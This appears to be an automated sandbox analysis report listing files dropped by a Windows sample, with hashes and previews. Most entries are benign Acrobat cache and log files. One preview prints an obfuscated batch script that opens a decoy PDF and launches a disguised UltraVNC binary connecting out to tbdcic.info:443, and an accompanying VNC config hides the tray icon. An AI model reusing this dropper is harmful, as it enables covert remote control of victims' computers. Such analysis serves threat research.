                                                                                        SHA1:C15E76A28F70A0DF0BF2F8E1933E8A6EEC61D03B
                                                                                        SHA-256:D5FD0CCE35D016253F35EFC0C1350FADE718C70CA429FA6FFCF66AE5546D7C48
                                                                                        SHA-512:5A089CDD037B88863AAE0E9FA70B9D7323F53A51103F90BCE2DE04D7C72CD50E093FCDFBCA74AED39461BDB9019652B9F3F5996250BBD33903CBA6B8268671DF
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):287
                                                                                        Entropy (8bit):5.285323910772497
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJf21rPeUkwRe9:YvXKXU8IT5LjIP9G+16Ukee9
                                                                                        MD5:27EC52F33F466A7BB6F6524148BAE6E2
                                                                                        SHA1:8E0C1E1A9C1B75D7B432F4FFDE13476076281EF3
                                                                                        SHA-256:8147845216016746F5255929D58CF0A3FFA1DB13D429ABF88C9FC15CCB056187
                                                                                        SHA-512:477EFEA3BEE0C97DFBE9182D5DFB7650239D7EE77CCF0A56E74B40CF842C8659982C8BD40FEAD5E5863A8E108C4443405866FBD1EB8016B46484EFB23D568B4F
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1090
                                                                                        Entropy (8bit):5.666720771935173
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6XuT5XIGamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS5:YvfXnBgkDMUJUAh8cvM5
                                                                                        MD5:CD8422AAD585699C3A55CE468611AF08
                                                                                        SHA1:41BA8F739DDB11D9D596EE51FE3DD648656A9761
                                                                                        SHA-256:C87571173040065B258D7E036A057190548B20830A18B9D9F889B2927F4837F5
                                                                                        SHA-512:BB7E1ED263DF62ACA33E4E9CEBB3643C450C5E0777034A0715C30966C666D13D41D071A69F69DB663B90BE6EEB044B6868EB7EFA2E7E10655DC5BF6567D69436
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):286
                                                                                        Entropy (8bit):5.259094824532125
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfshHHrPeUkwRe9:YvXKXU8IT5LjIP9GUUUkee9
                                                                                        MD5:581ECF14F2A0142FA9EABFE47A28022D
                                                                                        SHA1:9D079C6554565D0C5AA814FC36D4FCF367D217E2
                                                                                        SHA-256:30303FEEB26B11EF04E076890083179E2885539A4BAD640B87861913E5B97A5A
                                                                                        SHA-512:0DCCD612F8DFE8FC3ED568803353F73F4A612E8E7D51B79E2F0520DECADB416FDE3423730E182F7E3D717E7F1B2B38E6ED33C135BA9BE28F0ED593696041FF3E
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):282
                                                                                        Entropy (8bit):5.265147558302632
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJTqgFCrPeUkwRe9:YvXKXU8IT5LjIP9GTq16Ukee9
                                                                                        MD5:9DFCF4F584F06BDA135C6587893C4886
                                                                                        SHA1:01678390C264F1803526CE224E56A38E82305E24
                                                                                        SHA-256:9ECF4150EE6169F60F6B21564D186EB66E5DAD4B01940170F6301C90E81A2B08
                                                                                        SHA-512:491B63EFED6A07F0DFBB263E3848F7FD88AF1D807D316A36DADB1D5B08281D945D9D197A5949E417E6A2F67E8D31ED50FF76A383E9C442D4C4F42378A8E7323B
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):4
                                                                                        Entropy (8bit):0.8112781244591328
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:e:e
                                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                        Malicious:false
                                                                                        Preview:....
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2814
                                                                                        Entropy (8bit):5.141610659461906
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:Y/gdDdH/q1aig/jLu6MP/o2MDiv8pIVRB9g4c:m1SW6Tpug
                                                                                        MD5:EDB9F4FFF0403D693F5FA0D9586DC511
                                                                                        SHA1:9CEB3992A091B595141E788639B4E156BDA59BCE
                                                                                        SHA-256:205532FE1253018FDEA36EF6F61DBCA1420586FF6341292FFBDF1D11B2B6A26E
                                                                                        SHA-512:E5993DB8B55768B9961D9D7DA9C5F78DBE4A441E5FB75819E82685C014CF0958B97704621E3DCBC782F064FF0D750221E63B2BC4412754A42687D918B499AE74
                                                                                        Malicious:false
                                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"422e4c568a6739c0264ec028260018fb","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734957592000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"6a27dc83f2da3f7d7d78ec5d66b1e252","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734957592000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"e4a5650065eaa2b06bad7491eca89012","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734957592000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"b97c1cfd8bd4a8fa36882b800307eae1","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734957592000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"db36ccdd33e6602fde94add47a6eddda","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734957592000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"c3acbe1cffce4f368a4067238d178024","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 26, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 26
                                                                                        Category:dropped
                                                                                        Size (bytes):12288
                                                                                        Entropy (8bit):1.3662499336995675
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:TLBx/XYKQvGJF7urs9S6bqyKn6ylSTofcNqDuL0gqXKdqEKfS8EKfM1baj0gqF:Tll2GL7msMcKTlS8fcsujxfI76
                                                                                        MD5:4712E9545EA096EAC030255559AB3551
                                                                                        SHA1:B6A2967D6893504043E3F3600E1D13FB94BFFD40
                                                                                        SHA-256:3634D4D3F27D632FD92101A39846BE097CCD9BDBB09A2AE0AC446300099F0168
                                                                                        SHA-512:5538501D88A440FCAE873BC3846C90B6CCF4E455522E5FA9D448F8381AE53B3B0AB9C1F1598D5374CAABE2421A4E917444B06067644D41D0F03D3148F8FC0ECB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite Rollback Journal
                                                                                        Category:dropped
                                                                                        Size (bytes):8720
                                                                                        Entropy (8bit):1.8421635338052649
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:7+tnZ6bqyKn6ylSTofcNqDuL0gq+KdqEKfS8EKfM1banbqdqLKufx/XYKQvGJF7Z:7MZcKTlS8fcsujgfIIqGufl2GL7ms9
                                                                                        MD5:CEA7DA19D72DFC260DC0642861D24613
                                                                                        SHA1:D64E2E2CEDEBF14A35352CCF4C3CDBEA5BA20949
                                                                                        SHA-256:B6C88280FFDABC062DEC49BDC24D2E78F8671497C0D21108E48660F1DCB688B5
                                                                                        SHA-512:D4B2CE542099DEAFE6C66853BEAA2C3E62A4F519C27FAE4E0F6832553EB72F9605D24BD8289CA96D19BE2F0982AD6DBD5506E199F5743C572EBD9E497636BE2B
                                                                                        Malicious:false
                                                                                        Preview:.... .c...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):66726
                                                                                        Entropy (8bit):5.392739213842091
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEg5wGzNTIJlD+cBfgr3/EUvLojhMRE+DrYyu:6a6TZ44ADE5wONsJlD+Mfgj/5RhrK
                                                                                        MD5:DEA9A77BB5E370911E075E9FFAE32675
                                                                                        SHA1:292477297AA9145C349254C88ED7B91441196207
                                                                                        SHA-256:AC0118BF0CAB6D59111DA23BA5E957748790F4C8EC87E3E8441C303AF5C51DFC
                                                                                        SHA-512:43900FB431576E2748F6F65D6A52FB2F1455EFA81796118EBBF58E3DFB7B2AD2343F483FC8ED073CF227D2FEC09997A364F57F637C0868D13D3B02DAB53FDBAC
                                                                                        Malicious:false
                                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                        Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                                        File Type:DOS batch file, ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):1063
                                                                                        Entropy (8bit):5.595995239629694
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:gAULfghONR/OscFDuRCUKk7W26KkTczNJjE/tfW2tfnnLhA6MDxx/m:sLTR/OsSuQTI5rNJkflfnlLGx/m
                                                                                        MD5:38910F2D879725612BA1097E1F825C1E
                                                                                        SHA1:99F3C92122A6B333F94304DEED7D55D140BD9456
                                                                                        SHA-256:6D0A44B3563ADED3F056590B5A6FB848A9E17AF66F89F6C603068A379C372472
                                                                                        SHA-512:BBAB840AE212EB446B76B10201B137961B83CBA468A9938F3931241D54927A71CD0EEB689263267442D48FFCFF3EF402D11FBC06F6EA5836BCEEB2759C9D77A3
                                                                                        Malicious:false
                                                                                        Preview:@echo off.setlocal enabledelayedexpansion.set eK0qrm=nhost.set QJtV61=nne.set gQqfY2=co.set GkbpzI=exe.set Ps8o2E=Lom.set DYmP2A=pdf.set wSMj2e=raVNC.set KvwHVC=%COMPUTERNAME%.set bpAz1S=autore.set HZCo5u=%WINDIR%\Tasks\544191502.cmd.set Tnydkn=tbdcic.info.set fjmNEo=VPANJC.set lqHsNR=443.set RTbyfB=co.set MaNAw8=ct.set bxh0al=Ult.set gyoZzk=sync_browser.set YjXwLS=ini.timeout /t 1.copy "id2rlx.MxYNRd" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%" & start "" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%".timeout /t 1.taskkill /f /im %gyoZzk%.%GkbpzI% .timeout /t 2.copy "WPSela.LSZr7V" "%gyoZzk%.%GkbpzI%".timeout /t 1.copy "wFUH4p.aEmode" "%bxh0al%%wSMj2e%.%YjXwLS%".timeout /t 2.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% .timeout /t 8.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% -%bpAz1S%%gQqfY2%%QJtV61%%MaNAw8% -id:%KvwHVC%_%fjmNEo% -%gQqfY2%%QJtV61%%MaNAw8% %Tnydkn%:%lqHsNR%.timeout /t 2.copy "Nfe70s.UFVVkM" "%RTbyfB%%eK0qrm%.%GkbpzI%".timeout /t 4.:loop.if exist "%HZCo5u%" (. cmd /c "%HZCo5u%". tim
                                                                                        Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):867840
                                                                                        Entropy (8bit):6.386550733462827
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                                        MD5:0F568F6C821565AB9FF45C7457953789
                                                                                        SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                                        SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                                        SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: T8xrZb7nBL.exe, Detection: malicious, Browse
                                                                                        • Filename: Olz7TmvkEW.exe, Detection: malicious, Browse
                                                                                        • Filename: mSRW5AfJpC.exe, Detection: malicious, Browse
                                                                                        • Filename: T8xrZb7nBL.exe, Detection: malicious, Browse
                                                                                        • Filename: Olz7TmvkEW.exe, Detection: malicious, Browse
                                                                                        • Filename: mSRW5AfJpC.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1945368
                                                                                        Entropy (8bit):6.532894678367002
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                                        MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                                        SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                                        SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                                        SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: T8xrZb7nBL.exe, Detection: malicious, Browse
                                                                                        • Filename: Olz7TmvkEW.exe, Detection: malicious, Browse
                                                                                        • Filename: mSRW5AfJpC.exe, Detection: malicious, Browse
                                                                                        • Filename: T8xrZb7nBL.exe, Detection: malicious, Browse
                                                                                        • Filename: Olz7TmvkEW.exe, Detection: malicious, Browse
                                                                                        • Filename: mSRW5AfJpC.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                                        File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                                        Category:dropped
                                                                                        Size (bytes):605114
                                                                                        Entropy (8bit):7.931189302613814
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                                        MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                                        SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                                        SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                                        SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                                        Malicious:false
                                                                                        Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                                                        Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                                        File Type:Generic INItialization configuration [admin]
                                                                                        Category:dropped
                                                                                        Size (bytes):858
                                                                                        Entropy (8bit):5.216893826927931
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                                        MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                                        SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                                        SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                                        SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                                        Malicious:false
                                                                                        Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):246
                                                                                        Entropy (8bit):3.524398495091119
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAkY9:Qw946cPbiOxDlbYnuRKDlDm
                                                                                        MD5:7D6EA27DDC9CF9FBCABDE5A6FC40B722
                                                                                        SHA1:B320882E4F569DC01CD766CA6FE369ACE28678B9
                                                                                        SHA-256:29F80D593CC4C2984AC8F933BC8B7EEAE2E3A1EDEE575E0FF2117154A4D4A5C7
                                                                                        SHA-512:89FCBF5FC911529BEC41237A6C7EE71FB7ADB1ED2D7B38FE52F1668EDF99464CE1E4DC40D72EDADF2FE68B861C102B06B199C0C0DAF28238DDFA5BEDB270EBAD
                                                                                        Malicious:false
                                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.7.:.3.9.:.4.9. .=.=.=.....
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with very long lines (393)
                                                                                        Category:dropped
                                                                                        Size (bytes):16525
                                                                                        Entropy (8bit):5.330589339471305
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:usQfQQjZyDzISMjg0svDBjA49Y0/sQHpMVhrSWD0Wny6WxIWd44mJmtaEKHvMMwh:Ink
                                                                                        MD5:5BC0A308794F062FEC40F3016568DF9F
                                                                                        SHA1:14149448191AB45E99011CBBEF39F2A9A03A0D15
                                                                                        SHA-256:00D910C49F2885F6810F4019A916EFA52F12881CBF1525853D0C184E1B796473
                                                                                        SHA-512:CF12E0787C1C2A129BE61C4572CF8A28FC48039B2ADFD1816E58078D8DD900771442F210C545AD9B3F4EAEC23F6F1480F7BBF262B6A631160B20D0785BC17242
                                                                                        Malicious:false
                                                                                        Preview:SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:171+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):15114
                                                                                        Entropy (8bit):5.388276317030341
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:Q+iQ1j2eq6pd/56o1z6V2ElggfU2kQEdZOrhvbxgtgUDFSX/2N/hk/kZcBrzxiKF:vhS
                                                                                        MD5:537DFFABFB44D6719C5451C3C699CAB7
                                                                                        SHA1:1FFF59859FA11D4D671B60BF011E9D0E23F281D9
                                                                                        SHA-256:DA9496B57C279F7C5B2490370FA6A793AF581B4DB7F29D602BF7B5BAE89B894E
                                                                                        SHA-512:05F0E46D6B65E2F5BEC98F61CF31AA4A61E6B88F842FF12BCFAB63B780D9D4B22320D7BA1A21E65ED5E89E48A548DC2A1393805597FFCFC192BAF44BD90EA2C2
                                                                                        Malicious:false
